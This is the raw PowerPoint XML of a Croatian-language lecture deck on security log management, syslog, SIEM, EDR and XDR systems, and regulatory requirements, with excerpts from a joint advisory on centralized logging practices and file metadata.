          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Naravno kako se neka SIEM rješenja reklamiraju kao XDR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399872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hr-HR" dirty="0"/>
              <a:t>Preveliko oslanjanje na preventivne kontrole</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2400" b="1" dirty="0"/>
              <a:t>Gartner: „</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="2400" b="1" dirty="0"/>
              <a:t>All organizations should now assume that they are in a state of continuous compromise.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2400" b="1" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2400" dirty="0"/>
              <a:t>Naglasak na detekciju i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2400" dirty="0" err="1"/>
              <a:t>response</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2400" dirty="0"/>
              <a:t>Dvije vrste tvrtki</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2400" dirty="0"/>
              <a:t>Mnoge tvrtke previše vjeruju u prevenciju</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3623887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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zaključak</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61442" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Primjereno upravljanje logovima izuzetno važno</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Osnovni cilj čim prije detektirati zlonamjerne aktivnosti</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>U velikoj količini podataka detekcija veliki izazov</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Machine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>learning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> neophodan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pojašnjenje pojmova XDR, EDR, SIEM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
              <a:solidFill>
                <a:srgbClr val="26262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092A6-DF89-DCEC-EC37-53E3DA4418AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Regulatorni zahtjevi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9150E8CD-2DCA-59BF-BB58-7E1B22FF5C93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>DORA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>NIS2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>PCI DSS 4.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186398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C5F260-2B47-4AA6-8DC9-19D3EAD7E053}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Weak Security Controls and Practices Routinely Exploited for Initial Access</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rezervirano mjesto sadržaja 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92964DB2-7AC0-4891-8499-F961D4C7798F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://media.defense.gov/2022/May/17/2002998718/-1/-1/0/CSA_WEAK_SECURITY_CONTROLS_PRACTICES_EXPLOITED_FOR_INITIAL_ACCESS.PDF</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cyber actors routinely exploit poor security configurations (either</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>misconfigured or left unsecured), weak controls, and other poor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cyber hygiene practices to gain initial access or as part of other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tactics to compromise a victims’ system. </a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This joint Cybersecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advisory identifies commonly exploited controls and practices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and includes best practices to mitigate the issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This advisory was coauthored by the cybersecurity authorities of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the United States</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Canada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>New Zealand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Netherlands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and the United Kingdom.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63510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70FB1F-CEAD-4EE4-A4F4-873506A957F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Weak Security Controls and Practices Routinely Exploited for Initial Access</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rezervirano mjesto sadržaja 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD86E7A8-FD76-4377-A735-D63B837480BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Establish Centralized Log Management</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that each application and system generates sufficient log information. </a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider the following when implementing log collection and retention:</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determine which log files are required. These files can pertain to system logging, network logging, application logging, and cloud logging.</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set up alerts where necessary. </a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that your systems store log files in a usable file format, and that the recorded timestamps are accurate and set to the correct time zone</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forward logs off local systems to a centralized repository or security information and event management (SIEM) tools. </a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make a decision regarding the retention period of log files. </a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231457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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Upravljanje log zapisima</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Propisati procedure i politike za upravljanje log zapisima</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31748" name="Picture 2" descr="log mana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3143250"/>
            <a:ext cx="72231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Racunarstvo bijeli template</Template>
  <TotalTime>934</TotalTime>
  <Words>2407</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>254</Paragraphs>
  <Slides>50</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50</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="60" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Graphik</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Segoe UI Semibold</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Custom Design</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Verizon Data Breach Report </vt:lpstr>
      <vt:lpstr>Preveliko oslanjanje na preventivne kontrole</vt:lpstr>
      <vt:lpstr>Regulatorni zahtjevi</vt:lpstr>
      <vt:lpstr>Weak Security Controls and Practices Routinely Exploited for Initial Access</vt:lpstr>
      <vt:lpstr>Weak Security Controls and Practices Routinely Exploited for Initial Access</vt:lpstr>
      <vt:lpstr>Upravljanje log zapisima</vt:lpstr>
      <vt:lpstr>Prikupljanje log zapisa</vt:lpstr>
      <vt:lpstr>Što sve čini log zapise?</vt:lpstr>
      <vt:lpstr>Generiranje i slanje log zapisa</vt:lpstr>
      <vt:lpstr>Pohranjivanje log zapisa</vt:lpstr>
      <vt:lpstr>Analiza log zapisa</vt:lpstr>
      <vt:lpstr>Arhiviranje i uklanjanje log zapisa</vt:lpstr>
      <vt:lpstr>CIS G1 kontrole</vt:lpstr>
      <vt:lpstr>Tipovi log zapisa</vt:lpstr>
      <vt:lpstr>Sigurnosni log zapisi</vt:lpstr>
      <vt:lpstr>Sigurnosni log zapisi</vt:lpstr>
      <vt:lpstr>Sigurnosni log zapisi</vt:lpstr>
      <vt:lpstr>Audit zapisi</vt:lpstr>
      <vt:lpstr>Sistemski zapisi</vt:lpstr>
      <vt:lpstr>Aplikacijski log zapisi (audit/sistemski)</vt:lpstr>
      <vt:lpstr>Za razmišljanje</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Syslog</vt:lpstr>
      <vt:lpstr>Syslog</vt:lpstr>
      <vt:lpstr>Syslog</vt:lpstr>
      <vt:lpstr>Syslog</vt:lpstr>
      <vt:lpstr>Syslog</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SIEM sustavi</vt:lpstr>
      <vt:lpstr>Tri scenarija korištenja</vt:lpstr>
      <vt:lpstr>Korelacija događaja</vt:lpstr>
      <vt:lpstr>Gartnerov komentar</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Must-Have Capabilities </vt:lpstr>
      <vt:lpstr>Standard Capabilities </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Nedostatci SIEM rješenja</vt:lpstr>
      <vt:lpstr>Otvoreno pitanje</vt:lpstr>
      <vt:lpstr>EDR (Endpoint detection and response)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>XDR (Extended Detection and Response)</vt:lpstr>
      <vt:lpstr>XDR (Extended Detection and Response)</vt:lpstr>
      <vt:lpstr>XDR (Extended Detection and Response)</vt:lpstr>
      <vt:lpstr>Zaključak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GRAĐA RAČUNALA</dc:title>
  <dc:creator/>
  <cp:lastModifiedBy>Dražen Pranić</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-02-27T23:33:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-13T10:59:09Z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MSIP_Label_edf682b7-f91e-48bc-97e5-bfb95b32f5b9_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_edf682b7-f91e-48bc-97e5-bfb95b32f5b9_SetDate">
    <vt:lpwstr>2024-05-11T12:39:46Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_edf682b7-f91e-48bc-97e5-bfb95b32f5b9_Method">
    <vt:lpwstr>Privileged</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_edf682b7-f91e-48bc-97e5-bfb95b32f5b9_Name">
    <vt:lpwstr>defa4170-0d19-0005-0001-bc88714345d2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_edf682b7-f91e-48bc-97e5-bfb95b32f5b9_SiteId">
    <vt:lpwstr>fbb567ee-ca59-4aea-a378-fbf7761a4986</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_edf682b7-f91e-48bc-97e5-bfb95b32f5b9_ActionId">
    <vt:lpwstr>25eff7e6-0be1-49bd-8ff1-43df8fea110e</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="MSIP_Label_edf682b7-f91e-48bc-97e5-bfb95b32f5b9_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>